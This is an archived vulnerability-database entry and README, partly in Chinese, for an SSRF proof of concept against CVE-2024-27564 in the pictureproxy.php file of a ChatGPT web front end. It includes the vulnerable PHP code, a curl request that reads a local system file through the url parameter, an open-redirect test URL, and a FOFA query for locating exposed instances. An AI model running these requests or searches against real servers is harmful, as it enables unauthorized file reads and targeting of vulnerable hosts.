关联漏洞
标题:
ChatGPT 安全漏洞
(CVE-2024-27564)
描述:ChatGPT是一个基于OpenAI ChatGPT项目API的可视化界面站点。 ChatGPT commit f9f4bbc版本存在安全漏洞,该漏洞源于存在服务器请求伪造(SSRF)漏洞。攻击者可利用该漏洞通过向urlparameter注入特制的URL来迫使应用程序执行任意请求。
介绍
# SSRF-Exploit-CVE-2024-27564
# Project Title
This project demonstrates a Server-Side Request Forgery (SSRF) vulnerability in the `pictureproxy.php` file.
## Description
A vulnerability in `pictureproxy.php` allows remote attackers to perform arbitrary requests by injecting URLs into the `url` parameter. This SSRF vulnerability can be exploited without authentication, making it particularly dangerous.
The vulnerable code is in the `pictureproxy.php` file. The issue occurs because the function does not properly validate the `url` parameter. The `$_GET['url']` variable is passed to the `file_get_contents()` function, which fetches content from the specified URL. This can lead to SSRF.
## Proof of Concept
Here is a simple proof of concept that shows how the vulnerability can be exploited:
```php
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
```
To test the vulnerability, you can use the following curl command:
```bash
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
```
### Tested with Open Redirect
A test using an open redirect vulnerability:
```bash
https://64.media.tumblr.com/f07b73b374dc2ff6d5e4dbf39d2a6467/tumblr_nvani31DCm1u5url1o1_1280.jpg
```

## Tools
- **FOFA**: A search engine for Internet devices and vulnerabilities. Use the following command to search for relevant results:
```bash
"title="ChatGPT个人专用版""
```
## Conclusion
This project highlights the importance of properly validating user inputs to avoid SSRF vulnerabilities. Always ensure that parameters like URLs are thoroughly checked before being processed.
文件快照
[4.0K] /data/pocs/82eda70477f800f38d486c911632ed9b94c2117c
├── [ 758] exploit.yaml
└── [1.7K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。